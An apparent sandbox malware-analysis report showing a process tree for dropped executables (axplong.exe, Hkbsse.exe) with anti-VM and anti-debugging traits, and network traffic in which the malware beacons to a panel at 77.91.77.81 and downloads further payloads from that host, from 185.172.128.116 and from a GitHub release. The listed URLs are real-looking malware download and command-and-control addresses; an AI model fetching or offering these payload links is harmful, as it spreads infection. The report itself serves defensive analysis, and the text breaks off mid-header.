- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:4496

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:3904

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:2996

C:\Windows\SysWOW64\WerFault.exe
C:\Windows\SysWOW64\WerFault.exe -pss -s 184 -p 3448 -ip 3448
1⤵
PID:3200

C:\Program Files\Google\Chrome\Application\chrome.exe
"C:\Program Files\Google\Chrome\Application\chrome.exe"
1⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:4148
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x120,0x124,0x128,0x11c,0x12c,0x7ff97043ab58,0x7ff97043ab68,0x7ff97043ab78
  2⤵
  PID:5060
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --gpu-preferences=UAAAAAAAAADgAAAYAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAEgAAAAAAAAASAAAAAAAAAAYAAAAAgAAABAAAAAAAAAAGAAAAAAAAAAQAAAAAAAAAAAAAAAOAAAAEAAAAAAAAAABAAAADgAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=1848 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:2
  2⤵
  PID:1628
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2212 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:8
  2⤵
  PID:4892
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2260 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:8
  2⤵
  PID:2984
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --first-renderer-process --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --mojo-platform-channel-handle=3040 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:1
  2⤵
  PID:1888
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --mojo-platform-channel-handle=3260 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:1
  2⤵
  PID:3964
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --mojo-platform-channel-handle=4388 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:1
  2⤵
  PID:4388
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4576 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:8
  2⤵
  PID:3552
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4532 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:8
  2⤵
  PID:3052
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4516 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:8
  2⤵
  PID:452
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=4784 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:8
  2⤵
  PID:3624
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=4928 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:8
  2⤵
  PID:4744
- C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
  "C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --reenable-autoupdates --system-level
  2⤵
  PID:956
- - C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe
    "C:\Program Files\Google\Chrome\Application\110.0.5481.104\Installer\setup.exe" --type=crashpad-handler /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler --database=C:\Windows\TEMP\Crashpad --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=110.0.5481.104 --initial-client-data=0x254,0x258,0x25c,0x234,0x260,0x7ff73b9dae48,0x7ff73b9dae58,0x7ff73b9dae68
    3⤵
    PID:3540
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --mojo-platform-channel-handle=5060 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:1
  2⤵
  PID:3576
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2632 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:8
  2⤵
  PID:2020
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --mojo-platform-channel-handle=5032 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:1
  2⤵
  PID:656
- C:\Program Files\Google\Chrome\Application\chrome.exe
  "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --mojo-platform-channel-handle=4984 --field-trial-handle=1836,i,6122669963206026807,12077644893986229364,131072 /prefetch:1
  2⤵
  PID:4756

C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe
"C:\Program Files\Google\Chrome\Application\110.0.5481.104\elevation_service.exe"
1⤵
PID:4060

C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
C:\Users\Admin\AppData\Local\Temp\8254624243\axplong.exe
1⤵
- Identifies VirtualBox via ACPI registry values (likely anti-VM)
- Checks BIOS information in registry
- Executes dropped EXE
- Identifies Wine through registry keys
- Suspicious use of NtSetInformationThreadHideFromDebugger
PID:1360

C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
C:\Users\Admin\AppData\Local\Temp\28feeece5c\Hkbsse.exe
1⤵
- Executes dropped EXE
PID:3872

Network

DNS

8.8.8.8.in-addr.arpa

Remote address:

8.8.8.8:53

Request

8.8.8.8.in-addr.arpa

IN PTR

Response

8.8.8.8.in-addr.arpa

IN PTR

dnsgoogle
DNS

g.bing.com

Remote address:

8.8.8.8:53

Request

g.bing.com

IN A

Response

g.bing.com

IN CNAME

g-bing-com.dual-a-0034.a-msedge.net

g-bing-com.dual-a-0034.a-msedge.net

IN CNAME

dual-a-0034.a-msedge.net

dual-a-0034.a-msedge.net

IN A

13.107.21.237

dual-a-0034.a-msedge.net

IN A

204.79.197.237
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8AwHdN_sIGPsN45gTP_M3STVUCUyHdp4jVVdmwZH4MzJVaqu6Kyi1orKbpfMQeGW0L8o2d34pl4uRmc5OWkVLxhdoMMjuxB2Otdh8q573ZC18qJB0ZyB7-LGOue3-qkrpv9dfWfkzoGez3AFmO9eiEZj0eYNeU_7ftSFWsAjNB6U6pG5t%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC1lZGl0b3IlM2ZvY2lkJTNkY21taWV5YnVyNGM%26rlid%3D97e7bd89133e116e3abddbe1b655e81c&TIME=20240611T192913Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2

Remote address:

13.107.21.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8AwHdN_sIGPsN45gTP_M3STVUCUyHdp4jVVdmwZH4MzJVaqu6Kyi1orKbpfMQeGW0L8o2d34pl4uRmc5OWkVLxhdoMMjuxB2Otdh8q573ZC18qJB0ZyB7-LGOue3-qkrpv9dfWfkzoGez3AFmO9eiEZj0eYNeU_7ftSFWsAjNB6U6pG5t%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC1lZGl0b3IlM2ZvY2lkJTNkY21taWV5YnVyNGM%26rlid%3D97e7bd89133e116e3abddbe1b655e81c&TIME=20240611T192913Z&CID=531098720&EID=531098720&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MUID=236A1B7F833068582B010FD4828B69D1; domain=.bing.com; expires=Tue, 22-Jul-2025 14:07:25 GMT; path=/; SameSite=None; Secure; Priority=High;
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: E4651E4B2E7B4E329121C37504C90A4A Ref B: LON04EDGE0815 Ref C: 2024-06-27T14:07:25Z
date: Thu, 27 Jun 2024 14:07:24 GMT
GET

https://g.bing.com/neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8AwHdN_sIGPsN45gTP_M3STVUCUyHdp4jVVdmwZH4MzJVaqu6Kyi1orKbpfMQeGW0L8o2d34pl4uRmc5OWkVLxhdoMMjuxB2Otdh8q573ZC18qJB0ZyB7-LGOue3-qkrpv9dfWfkzoGez3AFmO9eiEZj0eYNeU_7ftSFWsAjNB6U6pG5t%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC1lZGl0b3IlM2ZvY2lkJTNkY21taWV5YnVyNGM%26rlid%3D97e7bd89133e116e3abddbe1b655e81c&TIME=20240611T192913Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2

Remote address:

13.107.21.237:443

Request

GET /neg/0?action=impression&rlink=https%3A%2F%2Fwww.bing.com%2Faclick%3Fld%3De8AwHdN_sIGPsN45gTP_M3STVUCUyHdp4jVVdmwZH4MzJVaqu6Kyi1orKbpfMQeGW0L8o2d34pl4uRmc5OWkVLxhdoMMjuxB2Otdh8q573ZC18qJB0ZyB7-LGOue3-qkrpv9dfWfkzoGez3AFmO9eiEZj0eYNeU_7ftSFWsAjNB6U6pG5t%26u%3DbWljcm9zb2Z0LWVkZ2UlM2FodHRwcyUzYSUyZiUyZnd3dy5taWNyb3NvZnQuY29tJTJmbWljcm9zb2Z0LTM2NSUyZm1pY3Jvc29mdC1lZGl0b3IlM2ZvY2lkJTNkY21taWV5YnVyNGM%26rlid%3D97e7bd89133e116e3abddbe1b655e81c&TIME=20240611T192913Z&CID=531098720&EID=&tids=15000&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373&muid=57578D2216C305ECD49867D03367A2A2 HTTP/2.0
host: g.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=236A1B7F833068582B010FD4828B69D1; _EDGE_S=SID=0AAF2CC4E0366E431F02386FE1F66FF0

Response

HTTP/2.0 204

cache-control: no-cache, must-revalidate
pragma: no-cache
expires: Fri, 01 Jan 1990 00:00:00 GMT
set-cookie: MSPTC=DpJC1eQLP3WjzxD4tWgqvhM9sJg06Zk_o1BC-ZBI-w0; domain=.bing.com; expires=Tue, 22-Jul-2025 14:07:25 GMT; path=/; Partitioned; secure; SameSite=None
strict-transport-security: max-age=31536000; includeSubDomains; preload
access-control-allow-origin: *
x-cache: CONFIG_NOCACHE
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 816678150BA64EE5B44DD22CC62E56A4 Ref B: LON04EDGE0815 Ref C: 2024-06-27T14:07:25Z
date: Thu, 27 Jun 2024 14:07:25 GMT
DNS

97.17.167.52.in-addr.arpa

Remote address:

8.8.8.8:53

Request

97.17.167.52.in-addr.arpa

IN PTR

Response
DNS

73.144.22.2.in-addr.arpa

Remote address:

8.8.8.8:53

Request

73.144.22.2.in-addr.arpa

IN PTR

Response

73.144.22.2.in-addr.arpa

IN PTR

a2-22-144-73deploystaticakamaitechnologiescom
GET

https://www.bing.com/aes/c.gif?RG=ede788dc18cc464a8f2c10d22be5f927&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T192913Z&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373

Remote address:

23.62.61.129:443

Request

GET /aes/c.gif?RG=ede788dc18cc464a8f2c10d22be5f927&med=10&pubId=251978541&tids=15000&type=mv&reqver=1.0&TIME=20240611T192913Z&adUnitId=11730597&localId=w:57578D22-16C3-05EC-D498-67D03367A2A2&deviceId=6755470482742373 HTTP/2.0
host: www.bing.com
accept-encoding: gzip, deflate
user-agent: WindowsShellClient/9.0.40929.0 (Windows)
cookie: MUID=236A1B7F833068582B010FD4828B69D1

Response

HTTP/2.0 200

cache-control: private,no-store
pragma: no-cache
vary: Origin
p3p: CP=BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo
accept-ch: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
x-msedge-ref: Ref A: 309AED2396EA4E99ACBAC6B91F47588E Ref B: DUS30EDGE0310 Ref C: 2024-06-27T14:07:25Z
content-length: 0
date: Thu, 27 Jun 2024 14:07:25 GMT
set-cookie: _EDGE_S=SID=0AAF2CC4E0366E431F02386FE1F66FF0; path=/; httponly; domain=bing.com
set-cookie: MUIDB=236A1B7F833068582B010FD4828B69D1; path=/; httponly; expires=Tue, 22-Jul-2025 14:07:25 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.7d3d3e17.1719497245.4e2390d
DNS

85.177.190.20.in-addr.arpa

Remote address:

8.8.8.8:53

Request

85.177.190.20.in-addr.arpa

IN PTR

Response
DNS

129.61.62.23.in-addr.arpa

Remote address:

8.8.8.8:53

Request

129.61.62.23.in-addr.arpa

IN PTR

Response

129.61.62.23.in-addr.arpa

IN PTR

a23-62-61-129deploystaticakamaitechnologiescom
GET

https://www.bing.com/th?id=OADD2.10239368184744_14DPBWVU0KKOKDZ8E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90

Remote address:

23.62.61.129:443

Request

GET /th?id=OADD2.10239368184744_14DPBWVU0KKOKDZ8E&pid=21.2&c=16&roil=0&roit=0&roir=1&roib=1&w=48&h=48&dynsize=1&qlt=90 HTTP/2.0
host: www.bing.com
accept: */*
cookie: MUID=236A1B7F833068582B010FD4828B69D1; _EDGE_S=SID=0AAF2CC4E0366E431F02386FE1F66FF0; MSPTC=DpJC1eQLP3WjzxD4tWgqvhM9sJg06Zk_o1BC-ZBI-w0; MUIDB=236A1B7F833068582B010FD4828B69D1
accept-encoding: gzip, deflate, br
user-agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/70.0.3538.102 Safari/537.36 Edge/18.19041

Response

HTTP/2.0 200

cache-control: public, max-age=2592000
content-type: image/png
access-control-allow-origin: *
access-control-allow-headers: *
access-control-allow-methods: GET, POST, OPTIONS
timing-allow-origin: *
report-to: {"group":"network-errors","max_age":604800,"endpoints":[{"url":"https://aefd.nelreports.net/api/report?cat=bingth"}]}
nel: {"report_to":"network-errors","max_age":604800,"success_fraction":0.001,"failure_fraction":1.0}
content-length: 5773
date: Thu, 27 Jun 2024 14:07:27 GMT
alt-svc: h3=":443"; ma=93600
x-cdn-traceid: 0.7d3d3e17.1719497246.4e23c83
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 4
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
Refresh: 0; url = Login.php
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 158
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:27 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/lend/gold.exe

axplong.exe

Remote address:

77.91.77.81:80

Request

GET /lend/gold.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:27 GMT
Content-Type: application/octet-stream
Content-Length: 505344
Last-Modified: Mon, 24 Jun 2024 19:43:11 GMT
Connection: keep-alive
ETag: "6679cc4f-7b600"
Accept-Ranges: bytes
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:29 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:30 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:32 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:34 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/lend/alex5555555.exe

axplong.exe

Remote address:

77.91.77.81:80

Request

GET /lend/alex5555555.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:34 GMT
Content-Type: application/octet-stream
Content-Length: 1822720
Last-Modified: Wed, 26 Jun 2024 15:53:49 GMT
Connection: keep-alive
ETag: "667c398d-1bd000"
Accept-Ranges: bytes
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:35 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
GET

http://77.91.77.81/lend/123.exe

axplong.exe

Remote address:

77.91.77.81:80

Request

GET /lend/123.exe HTTP/1.1
Host: 77.91.77.81

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:35 GMT
Content-Type: application/octet-stream
Content-Length: 304128
Last-Modified: Wed, 26 Jun 2024 16:01:49 GMT
Connection: keep-alive
ETag: "667c3b6d-4a400"
Accept-Ranges: bytes
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:36 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:49 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:53 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
POST

http://77.91.77.81/Kiru9gu/index.php

axplong.exe

Remote address:

77.91.77.81:80

Request

POST /Kiru9gu/index.php HTTP/1.1
Content-Type: application/x-www-form-urlencoded
Host: 77.91.77.81
Content-Length: 31
Cache-Control: no-cache

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:08:01 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: keep-alive
DNS

81.77.91.77.in-addr.arpa

Remote address:

8.8.8.8:53

Request

81.77.91.77.in-addr.arpa

IN PTR

Response
GET

http://185.172.128.116/NewLatest.exe

axplong.exe

Remote address:

185.172.128.116:80

Request

GET /NewLatest.exe HTTP/1.1
Host: 185.172.128.116

Response

HTTP/1.1 200 OK

Server: nginx/1.18.0 (Ubuntu)
Date: Thu, 27 Jun 2024 14:07:29 GMT
Content-Type: application/octet-stream
Content-Length: 424960
Last-Modified: Sun, 16 Jun 2024 06:41:45 GMT
Connection: keep-alive
ETag: "666e8929-67c00"
Accept-Ranges: bytes
DNS

116.128.172.185.in-addr.arpa

Remote address:

8.8.8.8:53

Request

116.128.172.185.in-addr.arpa

IN PTR

Response
DNS

github.com

powershell.exe

Remote address:

8.8.8.8:53

Request

github.com

IN A

Response

github.com

IN A

20.26.156.215
GET

https://github.com/frielandrews892/File/releases/download/installer/Installer.exe

axplong.exe

Remote address:

20.26.156.215:443

Request

GET /frielandrews892/File/releases/download/installer/Installer.exe HTTP/1.1
Host: github.com

Response

HTTP/1.1 302 Found

Server: GitHub.com
Date: Thu, 27 Jun 2024 14:07:31 GMT
Content-Type: text/html; charset=utf-8
Vary: X-PJAX, X-PJAX-Container, Turbo-Visit, Turbo-Frame, Accept-Encoding, Accept, X-Requested-With
Location: https://objects.githubusercontent.com/github-production-release-asset-2e65be/815364555/3f12ea9a-79fa-40c4-802f-9bbddfc164da?X-Amz-Algorithm=AWS4-HMAC-SHA256&X-Amz-Credential=releaseassetproduction%2F20240627%2Fus-east-1%2Fs3%2Faws4_request&X-Amz-Date=20240627T140731Z&X-Amz-Expires=300&X-Amz-Signature=015e1618dfceb5f5bc7fefa9af04c8fbf3deb464ffd837da1edb09b3be780567&X-Amz-SignedHeaders=host&actor_id=0&key_id=0&repo_id=815364555&response-content-disposition=attachment%3B%20filename%3DInstaller.exe&response-content-type=application%2Foctet-stream
Cache-Control: no-cache
Strict-Transport-Security: max-age=31536000; includeSubdomains; preload
X-Frame-Options: deny
X-Content-Type-Options: nosniff
X-XSS-Protection: 0
Referrer-Policy: no-referrer-when-downgrade
Content-Security-Policy: default-src 'none'; base-uri 'self'; child-src github.com/assets-cdn/worker/ gist.github.com/assets-cdn/worker/; connect-src 'self' uploads.github.com www.githubstatus.com collector.github.com raw.githubusercontent.com api.github.com github-cloud.s3.amazonaws.com github-production-repository-file-5c1aeb.s3.amazonaws.com github-production-upload-manifest-file-7fdce7.s3.amazonaws.com github-production-user-asset-6210df.s3.amazonaws.com api.githubcopilot.com objects-origin.githubusercontent.com copilot-proxy.githubusercontent.com/v1/engines/github-completion/completions *.actions.githubusercontent.com wss://*.actions.githubusercontent.com productionresultssa0.blob.core.windows.net/ productionresultssa1.blob.core.windows.net/ productionresultssa2.blob.core.windows.net/ productionresultssa3.blob.core.windows.net/ productionresultssa4.blob.core.windows.net/ productionresultssa5.blob.core.windows.net/ productionresultssa6.blob.core.windows.net/ productionresultssa7.blob.core.windows.net/ productionresultssa8.blob.core.windows.net/ productionresultssa9.blob.core.windows.net/ productionresultssa10.blob.core.windows.net/ productionresultssa11.blob.core.windows.net/ productionresultssa12.blob.core.windows.net/ productionresultssa13.blob.core.windows.net/ productionresultssa14.blob.core.windows.net/ productionresultssa15.blob.core.windows.net/ productionresultssa16.blob.core.windows.net/ productionresultssa17.blob.core.windows.net/ productionresultssa18.blob.core.windows.net/ productionresultssa19.blob.core.windows.net/ github-production-repository-image-32fea6.s3.amazonaws.com 